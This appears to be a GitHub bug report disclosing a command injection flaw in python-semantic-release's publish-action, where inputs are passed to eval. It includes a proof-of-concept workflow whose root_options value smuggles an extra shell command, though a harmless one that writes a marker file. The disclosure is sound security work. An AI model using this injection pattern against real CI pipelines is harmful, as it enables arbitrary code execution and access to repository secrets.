Description
Bug Report
Description
The publish-action GitHub Action uses eval to execute user-supplied input values, including root_options and indirectly tag, which allows for command injection. This can lead to arbitrary code execution within the CI runner context, especially dangerous when actions are used in workflows with write permissions.
Expected behavior
User-supplied inputs should be treated as arguments only and not executed as shell code. Commands should be constructed and invoked safely using arrays or quoted strings without eval.
Actual behavior
Inputs are interpolated into a string and passed to eval, allowing arbitrary shell commands to be executed. Example:
with:
root_options: "-h; echo 'INJECTED' > injected.txt"
This results in a new file being created by the injected command, confirming the ability to execute arbitrary commands.
Environment
- Action version: v9.21.1
Configuration
GitHub Actions Job Definition
name: PoC - eval injection
on:
workflow_dispatch:
jobs:
exploit:
runs-on: ubuntu-latest
permissions:
contents: write
steps:
- name: checkout
uses: actions/checkout@v4
- name: test injection
uses: python-semantic-release/publish-action@v9.21.1
with:
github_token: ${{ secrets.GITHUB_TOKEN }}
root_options: "-h; echo 'INJECTED COMMAND EXECUTED' > injected.txt; echo "
- name: upload other artifact
uses: actions/upload-artifact@v4
with:
name: injected-output
path: injected.txt
Execution Log
please check https://github.com/mleblebici/test-repo/actions/runs/14974445832/job/42063064035
Additional context
Workflow => https://github.com/mleblebici/test-repo/blob/main/.github/workflows/test.yml